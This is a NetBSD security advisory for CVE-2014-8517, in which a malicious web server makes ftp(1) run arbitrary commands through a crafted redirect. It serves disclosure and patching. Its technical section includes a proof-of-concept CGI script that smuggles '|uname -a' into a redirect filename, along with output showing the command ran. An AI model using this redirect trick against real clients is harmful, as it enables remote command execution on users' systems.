BSDSec

deadsimple BSD Security Advisories and Announcements

NetBSD Security Advisory 2014-013: ftp(1) can be made to execute arbitrary commands by a malicious webserver

3 November, 2014 by security-officer@NetBSD.org | netbsd 

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

		NetBSD Security Advisory 2014-013
		=================================

Topic:		ftp(1) can be made to execute arbitrary commands
		by a malicious webserver


Version:	NetBSD-current:		source prior to Oct 27th, 2014
		NetBSD 6.1 - 6.1.5:	affected
		NetBSD 6.0 - 6.0.6:	affected
		NetBSD 5.1 - 5.1.4:	affected
		NetBSD 5.2 - 5.2.2:	affected
		pkgsrc (net/tnftp)	affected

Severity:	remote command execution

Fixed:		NetBSD-current:		Oct 26th, 2014
		NetBSD-7 branch:	Oct 26th, 2014
		NetBSD-6-0 branch:	Oct 27th, 2014
		NetBSD-6-1 branch:	Oct 27th, 2014
		NetBSD-6 branch:	Oct 27th, 2014
		NetBSD-5-2 branch:	Oct 27th, 2014
		NetBSD-5-1 branch:	Oct 27th, 2014
		NetBSD-5 branch:	Oct 27th, 2014
		pkgsrc:			in version 20141031

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 5.1 are no longer supported.
It is recommended that all users upgrade to a supported release.


Abstract
========

A malicious http server can cause ftp(1) to execute arbitrary commands.

This vulnerability has been assigned CVE-2014-8517.


Technical Details
=================

If the ftp(1) program is used to act as http client and fetch data from
a website, and no output file is passed via the -o argument, the client
can be tricked into executing arbitrary commands.
When acting as http client, the ftp(1) program will follow http redirects,
and uses the part of the path after the last '/' from the last resource
it accesses as the output filename (as long as -o filename is not
specified).

After the output filename is resolved by the ftp client, if the rest
of the output filename begins with a '|', the output filename is
passed to popen(3).

Thus, a malicious web site could hide '|command' in a redirect and make
the client execute 'command' when ftp fetched that URL.

     a20$ pwd
     /var/www/cgi-bin
     a20$ ls -l
     total 4
     -rwxr-xr-x  1 root  wheel  159 Oct 14 02:02 redirect
     -rwxr-xr-x  1 root  wheel  178 Oct 14 01:54 |uname -a
     a20$ cat redirect
     #!/bin/sh
     echo 'Status: 302 Found'
     echo 'Content-Type: text/html'
     echo 'Connection: keep-alive'
     echo 'Location: http://192.168.2.19/cgi-bin/|uname%20-a'
     echo
     a20$

     a20$ ftp http://localhost/cgi-bin/redirect
     Trying ::1:80 ...
     ftp: Can't connect to `::1:80': Connection refused
     Trying 127.0.0.1:80 ...
     Requesting http://localhost/cgi-bin/redirect
     Redirected to http://192.168.2.19/cgi-bin/|uname%20-a
     Requesting http://192.168.2.19/cgi-bin/|uname%20-a
         32      101.46 KiB/s
     32 bytes retrieved in 00:00 (78.51 KiB/s)
     NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36
     ADT 2014
     Jared@Jared-PC:/cygdrive/d/netbsd/src/sys/arch/evbarm/compile/obj/CUBIE
     BOARD evbarm
     a20$


Solutions and Workarounds
=========================

Workaround: specifying an output filename by using "ftp -o <filename>"
circumvents the issue.

Solution:
Get a new ftp binary:

VERS being your NetBSD version
DATE being a build date past the fix date for your version
ARCH being your machine architecture
ftp -o /var/tmp/base.tgz http://nyftp.netbsd.org/pub/NetBSD-daily/VERS/DATE/ARCH/binary/sets/base.tgz
cd /
tar xzpf /var/tmp/base.tgz ./usr/bin/ftp

or build a new ftp binary from source.

Affected file: src/usr.bin/ftp/fetch.c
Fixed versions:
HEAD         1.206
netbsd-7     1.205.4.1
netbsd-6     1.195.2.2
netbsd-6-1   1.195.8.1
netbsd-6-0   1.195.6.1
netbsd-5     1.185.6.3
netbsd-5-2   1.185.6.2.4.1
netbsd-5-1   1.185.14.1



Thanks To
=========

Thanks to Jared McNeill, who found the issue by code inspection, and
Christos Zoulas for changing ftp(1) to only use | commands for user
supplied names.


Revision History
================

	2014-11-03	Initial release


More Information
================

Advisories may be updated as new information becomes available.
The most recent version of this advisory (PGP signed) can be found at 
  http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2014-013.txt.asc

Information about NetBSD and NetBSD security can be found at
http://www.NetBSD.org/ and http://www.NetBSD.org/Security/ .


Copyright 2014, The NetBSD Foundation, Inc.  All Rights Reserved.
Redistribution permitted only in full, unmodified form.

$NetBSD: NetBSD-SA2014-013.txt,v 1.1 2014/11/02 22:17:45 spz Exp $

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.15 (NetBSD)

iQIcBAEBAgAGBQJUV/DOAAoJEAZJc6xMSnBuWXsP/0JHubPskhuwiD04WK3QKqxS
7pI2767yoGuXQwdzEiIYiy2h3Fu8nc/ajLEeUwBn4opEI2tXOTkspjdMO+zqFN+Z
vl53ohkfVbRu9lgNIrwhXNrdqMa4RUZDbeurjHtwL27Jie/Pn34S+F1KW3Y8HF9Z
+byMgh/NQ0MVtntekjsji1K1v2RLCeFtj/fqPNT5qS0V9Q3YAfga2k7YJLpt1gVF
ELJBXLdc9E1V0F8fmq6KMVWgAQbNOwblTsmFEJB6dzTsDq8S1uJMeiRSOxYcwIAL
0SR3por56VO+T+55cxCiE6dDgG1gXrSO/4E+Qg/7EartswwGNGCKdLL/8uouEa4z
MWVpI9n8SqcunbhOMfs6RiMvCc8IU+IZUm5oafwZg6UcgesFVv+svv5yOFEWx9Ao
WQjoUrENY04P2fDHaA8wNWOgNltTqlRlghUUd/1BFABdRdZVy9GSs4q/dFkX9u2K
O/+584pAiUPJO5TvF21GkRCWXkAx8xBXpKvIWTquIyf1zMX0YwRdLC86eLScLJX+
30pl49nJnf0QMIcucdl2BLp+XAtKAwqq4DXCS7TQHLmB2gA6QAmAR1pnjuKnPesC
AXvzXxV2+JPCQv38N7GAOYVdURObfjhiubCFErWvRkF+fv19cLYxz48knouXbOgR
WDYihwgW4aBgf6EOkXCE
=JRi/
-----END PGP SIGNATURE-----